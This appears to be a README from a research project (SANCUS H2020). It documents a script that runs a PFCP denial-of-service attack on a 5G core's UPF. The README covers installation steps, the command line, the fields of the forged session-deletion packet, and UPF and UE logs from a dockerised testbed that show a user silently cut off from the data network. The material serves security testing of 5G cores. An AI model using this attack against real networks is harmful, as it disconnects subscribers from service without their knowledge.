# Introduction:

The python script of this directory executes a PFCP DoS attack via synthesized session deletion requests. The script successfully formulates PFCP packets, recognizable by tshark/wireshark, using scapy. The script saves the generated PFCP session deletion packets in a pcap file, and replays the capture file's content using tcpreplay in real-time.

The script has been tested in a dockerized 5G Core testbed. However, it can also be used in a Virtual Machine (VM)-based 5G Core testbed.

With respect to the dockerised 5G core testbed, the script is executed from the Session Management Function (SMF) container targeting the UPF.

This attack has been implemented in the context of the SANCUS H2020 project.  

# Attack Description

The PFCP DoS via Session Deletion attack is instanciated from the SMF of the 5G core network.

![SMF.png](./images/SMF.png)

The target of this attack is the UPF, which handles processes and forwards user data to the Data Network (DN).

![UPF.png](./images/UPF.png)

The goal of this attack is to dissassociate a targeted User Equipment (UE) from the Data Network (DN). More specifically, the script targets the PDU sessions between the clients and the DN in a such manner that does not dissasociate the UE from the 5G RAN or the Core network, but rather only cuts them off the DN. This attack is implemented on the N4 interface, and the impact can be observed in the N6 interface. The only way to re-associate an affected UE is re-initiating the attachement procedure: the affected UE can either re-start its session or enter the range of another gNb, at which event a new session endpoint identifier (SEID) will be attached to the UE's PDU session and the attack's effect will be nullified.

![impact.png](./images/impact.png)

# Requirements

In general, this attack script only requires scapy and tcpreplay. The following steps summarize the installation of the aforementioned python libraries.

Step 1: Update and Refresh Repository Lists

`sudo apt update`

Step 2: Install supporting software

`sudo apt install software-properties-common`

Step 3: Add Deadsnakes PPA

`sudo add-apt-repository ppa:deadsnakes/ppa`

`sudo apt update`

Step 4: Install python

`sudo apt install python3.8`

Step 5: Check python3 version

`python3 --version`

Step 6: Install pip3

`sudo apt install python3-pip -y`

Step 7: Install scapy 

`pip3 install scapy`

Step 8: Install "tcpreplay"

`sudo apt install tcpreplay -y`

# Attack Execution and Parameters
The following parameters are utilised by the script:

**1. IP_src:** The IPv4 address of the PFCP control plain (SMF). This parameter is provided as a command-line argument.

**2. IP_dst:** The IPv4 address of the PFCP user plain (UPF). This parameter is provided as a command-line argument.

**3. Iface:** The interface from which the malicious packets will be sent. This parameter is provided as a command-line argument.

The required parameters can be passed into the script as arguments. The targeted SEID is currently assumed to be `0x1`. When a UE device establishes a PDU connection with th DN, the session it has with the internet is identified by the SEID; as more PDU sessions are established through the 5G core, the SEID each session is assigned incrementally increases. For our tests, as we are only using a single UE, there is no point in defining more arguments as input parameters. This can be updated in the future, as more funcitonalities are added to the script. Therefor, for now only the source and destination IP addresses are required, which correspond to the SMF and UPF IPv4 addresses respectivelly.

The file which implements this attack is the **pfcp-SD-DoS.py** script.

Please navigate to the directory containing the file and execute it with sudo privileges whilst providing the required arguments:

`sudo python3 pfcp-SD-DoS.py <IP_src> <IP_dst> <Interface>`

E.g.,:

`sudo python3 pfcp-SD-DoS.py 172.21.0.107 172.21.0.110 eth0`

The output of the command will be:

```
~$sudo python3 pfcp-SD-DoS.py 172.21.0.107 172.21.0.110
sudo python3 sess-del-mod.py 172.21.0.1 172.13.2.1
Starting Session Deletion DoS with the following parameters:

Source IP = 172.21.0.1
Destination IP = 172.13.2.1

Target SEID is assumed to be equal to 0x1.

###[ Ethernet ]### 
  dst       = 00:0d:48:66:32:70
  src       = 00:24:d6:f3:95:85
  type      = IPv4
###[ IP ]### 
     version   = 4
     ihl       = None
     tos       = 0x0
     len       = None
     id        = 1
     flags     = 
     frag      = 0
     ttl       = 64
     proto     = udp
     chksum    = None
     src       = 172.21.0.1
     dst       = 172.13.2.1
     \options   \
###[ UDP ]### 
        sport     = 8805
        dport     = 8805
        len       = None
        chksum    = None
###[ PFCP (v1) Header ]### 
           version   = 1
           spare_b2  = 0x0
           spare_b3  = 0x0
           spare_b4  = 0x0
           MP        = 0
           S         = 1
           message_type= session_deletion_request
           length    = 12
           seid      = 0x1
           seq       = 101
           spare_oct = 0

None
WARNING: PcapWriter: unknown LL type for bytes. Using type 1 (Ethernet)
Actual: 1 packets (58 bytes) sent in 0.000217 seconds
Rated: 267281.1 Bps, 2.13 Mbps, 4608.29 pps
Flows: 1 flows, 4608.29 fps, 1 flow packets, 0 non-flow
Statistics for network device: wlp2s0
	Successful packets:        1
	Failed packets:            0
	Truncated packets:         0
	Retried packets (ENOBUFS): 0
	Retried packets (EAGAIN):  0
...
```
Observe that a new `sess-del.pcap` file has been created in the same directory where the script was executed. It contains the packet synthesized by scapy and replayed by tcpreplay. If you wish to re-run the script, make sure the sess-del.pcap file does not exist beforehand, as tcpreplay will attempt to replay all containing traffic.

Through wireshark, we can observe that all packets are formatted appropriately.

![wireshark-01.png](./images/wireshark-01.png)

If we run the command from within the 5G core, targeting the UPF as a highjacked SMF, we can observe the following logs:

```
root@6afd25b49b6a:/# tail -f /var/log/open5gs/upf.log
05/16 16:41:13.279: [app] INFO: File Logging: '/var/log/open5gs/upf.log' (../lib/app/ogs-init.c:132)
05/16 16:41:13.348: [pfcp] INFO: pfcp_server() [172.21.0.110]:8805 (../lib/pfcp/path.c:31)
05/16 16:41:13.348: [gtp] INFO: gtp_server() [172.21.0.110]:2152 (../lib/gtp/path.c:31)
05/16 16:41:13.356: [app] INFO: UPF initialize...done (../src/upf/app.c:31)
05/16 16:41:13.403: [pfcp] INFO: ogs_pfcp_connect() [172.21.0.107]:8805 (../lib/pfcp/path.c:59)
05/16 16:41:13.403: [upf] INFO: PFCP associated (../src/upf/pfcp-sm.c:173)
05/16 16:43:17.408: [upf] INFO: [Added] Number of UPF-Sessions is now 1 (../src/upf/context.c:157)
05/16 16:43:17.408: [gtp] INFO: gtp_connect() [172.21.0.107]:2152 (../lib/gtp/path.c:58)
05/16 16:43:17.408: [upf] INFO: UE F-SEID[CP:0x1 UP:0x1] APN[internet] PDN-Type[1] IPv4[10.45.0.2] IPv6[] (../src/upf/context.c:334)
05/16 16:43:17.419: [gtp] INFO: gtp_connect() [172.21.0.111]:2152 (../lib/gtp/path.c:58)
05/16 17:13:58.720: [upf] INFO: [Removed] Number of UPF-sessions is now 0 (../src/upf/context.c:187)
05/16 18:35:17.543: [core] ERROR: epoll failed (4:Interrupted system call) (../lib/core/ogs-epoll.c:209)
05/16 18:35:18.243: [core] ERROR: epoll failed (4:Interrupted system call) (../lib/core/ogs-epoll.c:209)
05/16 18:35:52.404: [core] ERROR: epoll failed (4:Interrupted system call) (../lib/core/ogs-epoll.c:209)
05/16 18:35:52.407: [upf] ERROR: No Context (../src/upf/n4-handler.c:191)
05/16 19:58:51.361: [core] ERROR: epoll failed (4:Interrupted system call) (../lib/core/ogs-epoll.c:209)
05/16 20:00:59.363: [core] ERROR: epoll failed (4:Interrupted system call) (../lib/core/ogs-epoll.c:209)
05/16 20:27:05.700: [upf] ERROR: No Context (../src/upf/n4-handler.c:394)
05/16 20:27:05.971: [upf] INFO: [Added] Number of UPF-Sessions is now 1 (../src/upf/context.c:157)
05/16 20:27:05.971: [upf] INFO: UE F-SEID[CP:0x2 UP:0x2] APN[internet] PDN-Type[1] IPv4[10.45.0.3] IPv6[] (../src/upf/context.c:334)
05/16 20:30:41.152: [upf] ERROR: No Context (../src/upf/n4-handler.c:394)
05/16 20:32:17.988: [upf] INFO: [Removed] Number of UPF-sessions is now 0 (../src/upf/context.c:187)
```

Interestingly, checking the logs of the UE does not reveal any issue with the PDU session after the attack has been implemeted. This hints that while the PDU session has been interrupted and the 5G tunnel to the DN is down, the link appears to be up at a Non-Access Stratum (NAS) level. Radio-level signalling is completely unaffected, and from the perspective of the user, the UE funtions normally. This highlights the severity of this attack.

```
root@0cbbc77e7ff9:/UERANSIM/build# ./nr-ue -c ./oai-ue.yaml
UERANSIM v3.1.9
[2022-05-16 20:27:05.693] [nas] [info] UE switches to state [MM-DEREGISTERED/PLMN-SEARCH]
[2022-05-16 20:27:05.695] [rls] [debug] Coverage change detected. [1] cell entered, [0] cell exited
[2022-05-16 20:27:05.695] [nas] [info] Serving cell determined [UERANSIM-gnb-208-93-1]
[2022-05-16 20:27:05.695] [nas] [info] UE switches to state [MM-DEREGISTERED/NORMAL-SERVICE]
[2022-05-16 20:27:05.695] [nas] [debug] Sending Initial Registration
[2022-05-16 20:27:05.695] [nas] [info] UE switches to state [MM-REGISTER-INITIATED/NA]
[2022-05-16 20:27:05.695] [rrc] [debug] Sending RRC Setup Request
[2022-05-16 20:27:05.696] [rrc] [info] RRC connection established
[2022-05-16 20:27:05.696] [nas] [info] UE switches to state [CM-CONNECTED]
[2022-05-16 20:27:05.722] [nas] [debug] Security Mode Command received
[2022-05-16 20:27:05.723] [nas] [debug] Selected integrity[2] ciphering[0]
[2022-05-16 20:27:05.747] [nas] [debug] Registration accept received
[2022-05-16 20:27:05.747] [nas] [info] UE switches to state [MM-REGISTERED/NORMAL-SERVICE]
[2022-05-16 20:27:05.747] [nas] [info] Initial Registration is successful
[2022-05-16 20:27:05.747] [nas] [info] Initial PDU sessions are establishing [1#]
[2022-05-16 20:27:05.747] [nas] [debug] Sending PDU Session Establishment Request
[2022-05-16 20:27:05.982] [nas] [debug] PDU Session Establishment Accept received
[2022-05-16 20:27:05.982] [nas] [info] PDU Session establishment is successful PSI[1]
[2022-05-16 20:27:06.006] [app] [info] Connection setup for PDU session[1] is successful, TUN interface[uesimtun0, 10.45.0.3] is up.
```
